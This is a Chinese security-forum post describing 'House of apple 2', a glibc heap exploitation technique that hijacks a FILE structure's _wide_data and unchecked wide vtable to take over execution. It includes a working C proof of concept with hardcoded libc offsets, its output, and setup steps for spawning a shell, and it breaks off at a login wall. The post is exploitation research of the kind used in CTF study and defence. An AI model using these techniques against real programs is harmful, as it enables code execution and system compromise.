[原创] House of apple 一种新的glibc中IO攻击方法 (2)

发表于: 2022-7-27 17:21 31880

[原创] House of apple 一种新的glibc中IO攻击方法 (2)

roderick01 活跃值

2022-7-27 17:21

31880

house of apple2
前言
利用条件
利用原理
利用思路
利用_IO_wfile_overflow函数控制程序执行流
利用_IO_wfile_underflow_mmap函数控制程序执行流
利用_IO_wdefault_xsgetn函数控制程序执行流
例题分析
总结

house of apple2

house of apple系列利用方法文章：

前言

之前提出了一种新的IO利用方法 house of apple。本篇是house of apple1的续集，继续给出基于IO_FILE->_wide_data的利用技巧。

在 house of apple1 的总结里面提到: house of apple1 的利用链可以在任意地址写堆地址，相当于一次largebin attack的效果。因此，house of apple1 需要和其他方法结合而进行后续的FSOP利用。

那么在只劫持_wide_data的条件下能不能控制程序的执行流呢？答案是肯定的。

本篇的house of apple2会提出几条新的IO利用链，在劫持_IO_FILE->_wide_data的基础上，直接控制程序执行流。

关于前置知识这里就不赘述了，详情可看 house of apple1。

利用条件

使用house of apple2的条件为：

已知heap地址和glibc地址
能控制程序执行IO操作，包括但不限于：从main函数返回、调用exit函数、通过__malloc_assert触发
能控制_IO_FILE的vtable和_wide_data，一般使用largebin attack去控制

利用原理

stdin/stdout/stderr这三个_IO_FILE结构体使用的是_IO_file_jumps这个vtable，而当需要调用到vtable里面的函数指针时，会使用宏去调用。以_IO_file_overflow调用为例，glibc中调用的代码片段分析如下

#define _IO_OVERFLOW(FP, CH) JUMP1 (__overflow, FP, CH)
 
#define JUMP1(FUNC, THIS, X1) (_IO_JUMPS_FUNC(THIS)->FUNC) (THIS, X1)
 
# define _IO_JUMPS_FUNC(THIS) (IO_validate_vtable (_IO_JUMPS_FILE_plus (THIS)))

其中，IO_validate_vtable函数负责检查vtable的合法性，会判断vtable的地址是不是在一个合法的区间。如果vtable的地址不合法，程序将会异常终止。

观察struct _IO_wide_data结构体，发现其对应有一个_wide_vtable成员。

struct _IO_wide_data
{

  wchar_t *_IO_read_ptr;    /* Current read pointer */

  wchar_t *_IO_read_end;    /* End of get area. */

  wchar_t *_IO_read_base;    /* Start of putback+get area. */

  wchar_t *_IO_write_base;    /* Start of put area. */

  wchar_t *_IO_write_ptr;    /* Current put pointer. */

  wchar_t *_IO_write_end;    /* End of put area. */

  wchar_t *_IO_buf_base;    /* Start of reserve area. */

  wchar_t *_IO_buf_end;        /* End of reserve area. */

  /* The following fields are used to support backing up and undo. */

  wchar_t *_IO_save_base;    /* Pointer to start of non-current get area. */

  wchar_t *_IO_backup_base;    /* Pointer to first valid character of

                   backup area */

  wchar_t *_IO_save_end;    /* Pointer to end of non-current get area. */

  __mbstate_t _IO_state;

  __mbstate_t _IO_last_state;

  struct _IO_codecvt _codecvt;

  wchar_t _shortbuf[1];

  const struct _IO_jump_t *_wide_vtable;
};

在调用_wide_vtable虚表里面的函数时，同样是使用宏去调用，仍然以vtable->_overflow调用为例，所用到的宏依次为：

#define _IO_WOVERFLOW(FP, CH) WJUMP1 (__overflow, FP, CH)
 
#define WJUMP1(FUNC, THIS, X1) (_IO_WIDE_JUMPS_FUNC(THIS)->FUNC) (THIS, X1)
 
#define _IO_WIDE_JUMPS_FUNC(THIS) _IO_WIDE_JUMPS(THIS)
 
#define _IO_WIDE_JUMPS(THIS) \

  _IO_CAST_FIELD_ACCESS ((THIS), struct _IO_FILE, _wide_data)->_wide_vtable

可以看到，在调用_wide_vtable里面的成员函数指针时，没有关于vtable的合法性检查。

因此，我们可以劫持IO_FILE的vtable为_IO_wfile_jumps，控制_wide_data为可控的堆地址空间，进而控制_wide_data->_wide_vtable为可控的堆地址空间。控制程序执行IO流函数调用，最终调用到_IO_Wxxxxx函数即可控制程序的执行流。

以下面提到的_IO_wdefault_xsgetn函数利用为例，编写demo示例如下：

#include
#include
#include
#include
#include 
 
void backdoor()
{

    printf("\033[31m[!] Backdoor is called!\n");

    _exit(0);
}
 
void main()
{

    setbuf(stdout, 0);

    setbuf(stdin, 0);

    setbuf(stderr, 0);
 
    char *p1 = calloc(0x200, 1);

    char *p2 = calloc(0x200, 1);

    puts("[*] allocate two 0x200 chunks");
 
    size_t puts_addr = (size_t)&puts;

    printf("[*] puts address: %p\n", (void *)puts_addr);

    size_t libc_base_addr = puts_addr - 0x84420;

    printf("[*] libc base address: %p\n", (void *)libc_base_addr);
 
    size_t _IO_2_1_stderr_addr = libc_base_addr + 0x1ed5c0;

    printf("[*] _IO_2_1_stderr_ address: %p\n", (void *)_IO_2_1_stderr_addr);
 
    size_t _IO_wstrn_jumps_addr = libc_base_addr + 0x1e8c60;

    printf("[*] _IO_wstrn_jumps address: %p\n", (void *)_IO_wstrn_jumps_addr);

    char *stderr2 = (char *)_IO_2_1_stderr_addr;

    puts("[+] step 1: change stderr->_flags to 0x800");

    *(size_t *)stderr2 = 0x800;
 
    puts("[+] step 2: change stderr->_mode to 1");

    *(size_t *)(stderr2 + 0xc0) = 1;

    puts("[+] step 3: change stderr->vtable to _IO_wstrn_jumps-0x20");

    *(size_t *)(stderr2 + 0xd8) = _IO_wstrn_jumps_addr-0x20;

    puts("[+] step 4: replace stderr->_wide_data with the allocated chunk p1");

    *(size_t *)(stderr2 + 0xa0) = (size_t)p1;

    puts("[+] step 5: set stderr->_wide_data->_wide_vtable with the allocated chunk p2");

    *(size_t *)(p1 + 0xe0) = (size_t)p2;
 
    puts("[+] step 6: set stderr->_wide_data->_wide_vtable->_IO_write_ptr >  stderr->_wide_data->_wide_vtable->_IO_write_base");

    *(size_t *)(p1 + 0x20) = (size_t)1;
 
    puts("[+] step 7: put backdoor at fake _wide_vtable->_overflow");

    *(size_t *)(p2 + 0x18) = (size_t)(&backdoor);
 
    puts("[+] step 8: call fflush(stderr) to trigger backdoor func");

    fflush(stderr);
 
}

编译后输出：

[*] allocate two 0x200 chunks

[*] puts address: 0x7f8f73d2e420

[*] libc base address: 0x7f8f73caa000

[*] _IO_2_1_stderr_ address: 0x7f8f73e975c0

[*] _IO_wstrn_jumps address: 0x7f8f73e92c60

[+] step 1: change stderr->_flags to 0x800

[+] step 2: change stderr->_mode to 1

[+] step 3: change stderr->vtable to _IO_wstrn_jumps-0x20

[+] step 4: replace stderr->_wide_data with the allocated chunk p1

[+] step 5: set stderr->_wide_data->_wide_vtable with the allocated chunk p2

[+] step 6: set stderr->_wide_data->_wide_vtable->_IO_write_ptr >  stderr->_wide_data->_wide_vtable->_IO_write_base

[+] step 7: put backdoor at fake _wide_vtable->_overflow

[+] step 8: call fflush(stderr) to trigger backdoor func

[!] Backdoor is called!

可以看到，成功调用了后门函数。

利用思路

目前在glibc源码中搜索到的_IO_WXXXXX系列函数的调用只有_IO_WSETBUF、_IO_WUNDERFLOW、_IO_WDOALLOCATE和_IO_WOVERFLOW。
其中_IO_WSETBUF和_IO_WUNDERFLOW目前无法利用或利用困难，其余的均可构造合适的_IO_FILE进行利用。这里给出我总结的几条比较好利用的链。以下使用fp指代_IO_FILE结构体变量。

利用_IO_wfile_overflow函数控制程序执行流

对fp的设置如下：

_flags设置为~(2 | 0x8 | 0x800)，如果不需要控制rdi，设置为0即可；如果需要获得shell，可设置为 sh;，注意前面有两个空格
vtable设置为_IO_wfile_jumps/_IO_wfile_jumps_mmap/_IO_wfile_jumps_maybe_mmap地址（加减偏移），使其能成功调用_IO_wfile_overflow即可
_wide_data设置为可控堆地址A，即满足*(fp + 0xa0) = A
_wide_data->_IO_write_base设置为0，即满足*(A + 0x18) = 0
_wide_data->_IO_buf_base设置为0，即满足*(A + 0x30) = 0
_wide_data->_wide_vtable设置为可控堆地址B，即满足*(A + 0xe0) = B
_wide_data->_wide_vtable->doallocate设置为地址C用于劫持RIP，即满足*(B + 0x68) = C

函数的调用链如下：

_IO_wfile_overflow

    _IO_wdoallocbuf

        _IO_WDOALLOCATE

            *(fp->_wide_data->_wide_vtable + 0x68)(fp)

详细分析如下：
首先看_IO_wfile_overflow函数

wint_t

_IO_wfile_overflow (FILE *f, wint_t wch)
{

  if (f->_flags & _IO_NO_WRITES) /* SET ERROR */

    {

      f->_flags |= _IO_ERR_SEEN;

      __set_errno (EBADF);

      return WEOF;

    }

  /* If currently reading or no buffer allocated. */

  if ((f->_flags & _IO_CURRENTLY_PUTTING) == 0)

    {

      /* Allocate a buffer if needed. */

      if (f->_wide_data->_IO_write_base == 0)

    {

      _IO_wdoallocbuf (f);// 需要走到这里

      // ......

    }

    }
}

需要满足f->_flags & _IO_NO_WRITES == 0并且f->_flags & _IO_CURRENTLY_PUTTING == 0和f->_wide_data->_IO_write_base == 0

登录后可查看完整内容

[注意]看雪招聘，专注安全领域的专业人才平台！

最后于 2023-12-20 13:32 被roderick01编辑，原因：更新链接

#基础知识

上传的附件：

pwn_oneday.zip （6.57MB，67次下载）

收藏・10

免费・12

支持

赞赏记录

参与人

雪币

留言

时间

心游尘世外

为你点赞！

2024-11-24 01:36

mb_ehugywjk

谢谢你的细致分析，受益匪浅！

2024-11-23 00:41

leeya_bug

感谢你的贡献，论坛因你而更加精彩！

2024-11-17 19:33

apwnaroot

这个讨论对我很有帮助，谢谢！

2024-9-10 00:25

DATAL

为你点赞~

2024-1-25 09:53

jelasin

为你点赞~

2023-12-10 16:43

北门观雪

为你点赞~

2023-11-20 19:17

伟叔叔

为你点赞~

2023-3-18 01:43

Nameless_a

为你点赞~

2022-8-8 13:15

PLEBFE

为你点赞~

2022-7-28 09:05

winmt

为你点赞~

2022-7-27 18:48

YenKoc

为你点赞~

2022-7-27 17:43

打赏 + 80.00雪花

Editor

打赏次数 1

雪花 + 80.00

收起

Editor

+80.00

2022/08/03

恭喜您获得“雪花”奖励，安全圈有你而精彩！

最新回复 (2)
huangjw 雪币： 4851 活跃值： (7154) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 179 粉丝 2 关注私信	huangjw 2 楼 mark 谢谢分享 2022-7-27 18:44 0
winmt 雪币： 163 活跃值： (8784) 能力值： ( LV13，RANK：438 ) 在线值：发帖 10 回帖 61 粉丝 281 关注私信	winmt 9 3 楼 mark 谢谢分享 2022-7-27 18:49 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复